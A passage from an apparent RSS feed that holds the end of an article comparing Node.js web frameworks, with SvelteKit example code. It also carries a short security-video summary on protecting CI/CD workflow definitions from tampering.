  const response = await fetch(`/api/dogs/${params.id}`);

  if (response.ok) {
    const dog = await response.json();
    // The object returned here is passed as the 'data' prop to the page.
    return {
      dog: dog
    };
  }

  // If the API returns an error, forward it to the user.
  throw error(response.status, 'Dog breed not found');
}</code></pre>



<p class="wp-block-paragraph">The second component is the UI:</p>



<pre class="wp-block-code"><code>// src/routes/dogs/[id]/+page.svelte



<div>
  <h1>Dog Breed Profile</h1>
  <p>Breed Name: <strong>{data.dog.breed}</strong></p>
</div></code></pre>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">The Node.js ecosystem has moved beyond the “default-to-Express” days. Now, it is worth your time to look for a framework that fits your specific situation.<br><br>If you are building <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a> or high-performance APIs, where every millisecond counts, you owe it to yourself to look at minimalist frameworks like Fastify or Hono. This class of frameworks gives you raw speed and total control without requiring decisions about infrastructure.<br><br>If you are building an enterprise monolith or working with a big team, batteries-included frameworks like Nest or Adonis offer useful structure. The complexity of the initial setup buys you long-term maintainability and makes the codebase more standardized for new developers.<br><br>Finally, if your project is a content-rich web application, full-stack meta-frameworks like Next, Nuxt, and SvelteKit offer the best developer experience and the perfect profile of tools.<br><br>It’s also worth noting that, while Node remains the standard server-side runtime, alternatives <a href="https://www.infoworld.com/article/2256205/what-is-deno-a-better-nodejs.html">Deno</a> and <a href="https://www.infoworld.com/article/2338008/explore-bunjs-the-all-in-one-javascript-runtime.html">Bun</a> have both made a name for themselves. Deno has great heritage, is open source with a strong security focus, and has its own framework, <a href="https://www.infoworld.com/article/3523813/intro-to-deno-fresh-a-fresh-take-on-full-stack-javascript.html">Deno Fresh</a>. Bun is respected for its ultra-fast startup and integrated tooling.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your CI Pipeline Becomes the Attack]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Dependency pinning helps ensure consistent builds, but it doesn't protect a CI/CD pipeline if an attacker can modify the workflow itself. A workflow is ultimately executable code, often defined in a YAML file, running on infrastru...]]></description>
<link>https://tsecurity.de/de/3665484/it-security-video/your-ci-pipeline-becomes-the-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665484/it-security-video/your-ci-pipeline-becomes-the-attack/</guid>
<pubDate>Mon, 13 Jul 2026 16:03:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/mNojAWwa_AE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Dependency pinning helps ensure consistent builds, but it doesn't protect a CI/CD pipeline if an attacker can modify the workflow itself. A workflow is ultimately executable code, often defined in a YAML file, running on infrastructure that may have access to cloud credentials or other sensitive secrets.<br />
<br />
Protecting the integrity of CI/CD workflows is just as important as securing the code they execute. If an attacker gains permission to change the workflow, they may be able to execute arbitrary commands and abuse credentials available during the build process.<br />
<br />
Are your CI/CD protections focused mainly on dependencies, or do they place equal emphasis on who can modify workflow definitions?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#CICD #DevSecOps #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,26ms -->